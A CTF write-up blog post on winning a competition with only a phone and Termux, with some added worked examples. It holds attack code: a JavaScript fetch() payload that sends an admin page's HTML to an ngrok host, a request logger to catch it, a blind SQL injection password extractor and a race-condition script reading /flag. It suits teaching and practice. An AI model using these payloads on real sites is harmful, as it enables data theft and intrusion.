Holding 1st at a CTF with Just a Phone

Author: Ailton Baúque (vybraan), Twitter @vybraan

A Journey of Ingenuity

You don't need a powerful computer to hack; sometimes a simple smartphone, a bit of creativity and a knack for problem-solving are all you need. That's exactly how I won first place in a Capture The Flag (CTF) challenge during the summer of 2023, as part of UEM's ICT4Dev program. I didn't have a laptop, so I turned my phone into a hacking station and got to work on challenges that really tested my patience.

I relied on Termux, an Android terminal emulator that became my makeshift development environment and allowed me to install the essential tools. I had to deal with challenges like SQL injection, Cross-Site Request Forgery, object serialization and so on, and I tried different solutions to get past them.

For example, when I needed to inspect network resources, I turned Termux into a GUI environment: I installed Xorg, a VNC server, Openbox and Firefox, and used VNC Viewer from the Play Store to get a desktop-like environment with access to the browser's developer tools for tasks like cookie manipulation. The setup was far from smooth, but it got the job done.

To get Termux set up, follow some of the steps I described in my other article.

The challenges were Jeopardy-style, requiring creativity and skill, and the phone's capabilities were more than adequate.

1. CSRF Attack via Ngrok

To exploit a server-side vulnerability, I used Ngrok to expose a local server to the internet. With a simple HTTP request logger in Python, stolen from GitHub, I captured the POST requests sent by a smuggled JavaScript payload executed in the admin's browser.

Python Logger Code:

"""
License: MIT License
Copyright (c) 2023 Miel Donkers
Very simple HTTP server in python for logging requests
Usage::
    ./server.py [<port>]
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
import logging

class SimpleLogger(BaseHTTPRequestHandler):
    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length)
        logging.info(f"POST request: {post_data.decode('utf-8')}")
        self.send_response(200)
        self.end_headers()

HTTPServer(('', 8080), SimpleLogger).serve_forever()

Smuggled JavaScript payload executed by the admin:

// simplified version
// A form-encoded POST is a "simple" request: the browser sends it cross-origin
// without a CORS preflight, and the response is never read, so the page's
// origin policy does not stop the exfiltration.
fetch('https://example.ngrok.io', {
  method: 'POST',
  headers: {'Content-Type': 'application/x-www-form-urlencoded'},
  body: `data=${encodeURIComponent(document.body.innerHTML)}`
});

And just like that, I snagged the flag hidden in admin-only data.
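Strictly speaking, the payload above is cross-site scripting used for exfiltration rather than CSRF: it runs JavaScript inside the admin's origin and reads the page, whereas CSRF forges a state-changing request without being able to read the response. The following is an added example, not code from the original post: a variant of the logger that decodes the form body the payload sends and extracts flag-shaped strings, exercised end-to-end on loopback with a constructed admin page standing in for the victim's browser. The CTF{...} flag format, the loopback port binding and the sample HTML are assumptions.

```python
import re
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlencode
from urllib.request import Request, urlopen

# Flag format is an assumption for the demo; adjust to the event's format.
FLAG_RE = re.compile(r"CTF\{[^}]+\}")

captured = []   # one dict per received POST: decoded fields and any flags found


class ExfilHandler(BaseHTTPRequestHandler):
    """Like the page's logger, but decodes the form body the payload sends and
    pulls flag-shaped strings out of the exfiltrated HTML instead of dumping it."""

    def do_POST(self):
        # A missing Content-Length would crash int(None); default to 0
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length).decode("utf-8", errors="replace")
        fields = parse_qs(body)                 # undoes encodeURIComponent / '+'
        html = fields.get("data", [""])[0]
        captured.append({"fields": fields, "flags": FLAG_RE.findall(html)})
        self.send_response(204)                 # nothing to say back to the victim
        self.end_headers()

    def log_message(self, *args):               # keep stderr quiet during the demo
        pass


def start_logger():
    """Bind 127.0.0.1 on an ephemeral port and serve in a background thread.
    In the real setup ngrok would forward a public URL to this port."""
    server = HTTPServer(("127.0.0.1", 0), ExfilHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def simulate_victim(port, html):
    """Stand-in for the admin's browser running the fetch() payload."""
    body = urlencode({"data": html}).encode()
    req = Request(f"http://127.0.0.1:{port}/", data=body,
                  headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urlopen(req, timeout=5) as resp:
        return resp.status


def run_demo():
    """End-to-end exchange on loopback with a constructed admin page."""
    server, port = start_logger()
    try:
        page = ("<h1>Admin panel</h1><p>Note to self: CTF{constructed_example_flag}</p>"
                "<a href=\"/logout?next=/&amp;x=1\">logout</a>")
        status = simulate_victim(port, page)
        return status, captured[-1]["flags"]
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(run_demo())   # (204, ['CTF{constructed_example_flag}'])
```

Replying with 204 and no body keeps the victim's browser quiet; the decoded `fields` are still kept so that anything the regex misses can be read by hand.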

2. Blind SQL Injection

Blind SQLi is tedious but rewarding. I wrote a script to extract a password one character at a time, comparing ASCII values to identify the correct characters:

# simplified version
import requests

URL = "http://vulnerable-site.com/login"
session = requests.Session()

# Assumed backend query: ... WHERE username='<u>' AND password='<p>'
# The leading OR keeps the injected condition in play even though the empty
# password literal makes the first half of the WHERE false.
def oracle(condition):
    injection = f"' OR username='admin' AND {condition} -- "
    response = session.post(URL, data={"username": "admin", "password": injection}, timeout=10)
    return "Welcome" in response.text

password = ""
for position in range(1, 41):  # Assuming a 40-character password - wild guess
    for char_code in range(32, 127):  # Printable ASCII range
        if oracle(f"ASCII(SUBSTRING(password,{position},1))={char_code}"):
            password += chr(char_code)
            print(chr(char_code), end='', flush=True)
            break
    else:
        break  # no printable character matched: we have run off the end of the password
print(f"\nRecovered: {password}")

This brute-forced the flag character by character. Slow? Yes. Effective? Absolutely.
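As an added example (not the author's script), the same extraction carried out with a binary search over each character's code point instead of a linear scan of 95 candidates, run against a constructed in-memory SQLite table that reproduces the injectable query shape so it works offline. The table contents, the assumed query `WHERE username='...' AND password='...'`, and the SQLite spelling of the string functions are assumptions; the hardened parameterised query is shown beside the vulnerable one.

```python
import sqlite3

SECRET_PASSWORD = "s3cr3t_Fl4g!"   # constructed; what the attacker must recover


def make_db():
    """In-memory stand-in for the challenge's user table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', ?)", (SECRET_PASSWORD,))
    return db


def vulnerable_login(db, username, password):
    """The injectable pattern: user input concatenated straight into the SQL.
    True stands for the 'Welcome' page, False for the login error."""
    sql = (f"SELECT 1 FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    return db.execute(sql).fetchone() is not None


def safe_login(db, username, password):
    """Hardened form: parameters are bound, never spliced into the query text."""
    sql = "SELECT 1 FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone() is not None


class Oracle:
    """Turns the login page into a yes/no oracle for an arbitrary SQL condition
    and counts how many requests that costs."""

    def __init__(self, db):
        self.db, self.queries = db, 0

    def __call__(self, condition):
        self.queries += 1
        # The leading OR keeps the injected condition live even though the
        # password='' half of the original WHERE is false; -- comments out the
        # trailing quote the application appends.
        payload = f"' OR username='admin' AND ({condition}) -- "
        return vulnerable_login(self.db, "admin", payload)


def extract_password(ask, max_len=64):
    """Binary search on the code point of each character: 7 requests per
    character for a 128-value window, versus up to 95 with the linear scan.
    SQLite spells the functions unicode()/substr(); MySQL uses ASCII()/SUBSTRING()."""
    recovered = ""
    for pos in range(1, max_len + 1):
        if not ask(f"length(password) >= {pos}"):
            break                                  # walked off the end of the string
        lo, hi = 0, 127                            # invariant: code point in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(f"unicode(substr(password,{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    ask = Oracle(make_db())
    print(extract_password(ask), ask.queries)   # s3cr3t_Fl4g! 97
```

The length check before each position is what stops the loop cleanly instead of guessing a maximum length; the same oracle can be pointed at any other column or table once the condition string is changed.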

3. Race Condition Exploitation

To exploit a race condition, I used threads to send simultaneous requests, which let me execute restricted actions by triggering concurrent processing.

# simplified version
from threading import Thread
import requests

URL = "http://vulnerable-site.com/run"

def send_request(payload):
    # Print the body so the flag is visible if this request wins the race
    response = requests.post(URL, data={"code": payload}, timeout=10)
    print(response.text)

payload_1 = "print('Hello, world!')"
payload_2 = "f=open('/flag'); print(f.read())"

# The window is narrow, so fire several pairs rather than a single one
for _ in range(20):
    threads = [Thread(target=send_request, args=(p,)) for p in (payload_1, payload_2)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()

One thread ran normal code while the other accessed a restricted file, revealing the flag.
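The post does not say what the server's race actually was, so the following is an added example (not the challenge's code) of the bug class that produces exactly this symptom: a sandbox that blocks the file only while user code runs, tracked by one boolean shared by every request, so a quick request finishing lifts the restriction for a slow request still executing. Events pin the interleaving so the demo is repeatable, whereas the real attack fires many pairs and waits for the lucky one; the fixed version beside it keeps the restriction per request. The sandbox mechanism, the flag value and the handler names are assumptions.

```python
import threading

FLAG = "CTF{constructed_race_flag}"   # stand-in for the contents of /flag


class SharedFlagSandbox:
    """Hypothetical runner with the bug class the attack needs: /flag is blocked
    only while user code runs, tracked by ONE boolean shared by all requests.
    When a short run finishes it clears the flag for a longer run still going."""

    def __init__(self):
        self.restricted = False

    def read_flag(self):
        if self.restricted:
            raise PermissionError("/flag is blocked while user code runs")
        return FLAG

    def run(self, user_code):
        self.restricted = True                  # enter sandbox mode ...
        try:
            return user_code(self.read_flag)
        finally:
            self.restricted = False             # ... BUG: also exits it for others


class PerRunSandbox:
    """Fixed design: the restriction belongs to the request, not the server,
    so another request finishing cannot change this request's view of it."""

    def run(self, user_code):
        ctx = {"restricted": True}

        def read_flag():
            if ctx["restricted"]:
                raise PermissionError("/flag is blocked while user code runs")
            return FLAG

        return user_code(read_flag)


def race(sandbox):
    """Two concurrent requests, as in the page's script: a quick no-op and a
    slow one that reads /flag. Events force the losing interleaving so the demo
    is deterministic; a real attack fires many pairs and waits for it to happen."""
    slow_entered, quick_done = threading.Event(), threading.Event()
    results = {}

    def quick_code(read_flag):
        return "Hello, world!"

    def slow_code(read_flag):
        slow_entered.set()            # we are inside the sandbox now
        quick_done.wait(timeout=2)    # keep running until the other request finishes
        try:
            return read_flag()
        except PermissionError as exc:
            return f"denied: {exc}"

    slow = threading.Thread(target=lambda: results.update(slow=sandbox.run(slow_code)))
    quick = threading.Thread(target=lambda: results.update(quick=sandbox.run(quick_code)))
    slow.start()
    slow_entered.wait(timeout=2)      # only start the quick run once the slow one is inside
    quick.start()
    quick.join()
    quick_done.set()                  # the slow run now reads /flag after the quick one reset the switch
    slow.join()
    return results


if __name__ == "__main__":
    print("vulnerable:", race(SharedFlagSandbox()))
    print("fixed:     ", race(PerRunSandbox()))
```

Holding a lock around the whole of `run()` would also close the hole, at the cost of serialising every request; carrying the restriction in per-request state fixes it without that cost.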


The CTF was a thrilling reminder that hacking is less about the equipment you have and more about how you think. Fancy hardware can make life easier, but creativity is the ultimate hacking tool.

That’s all, see ya!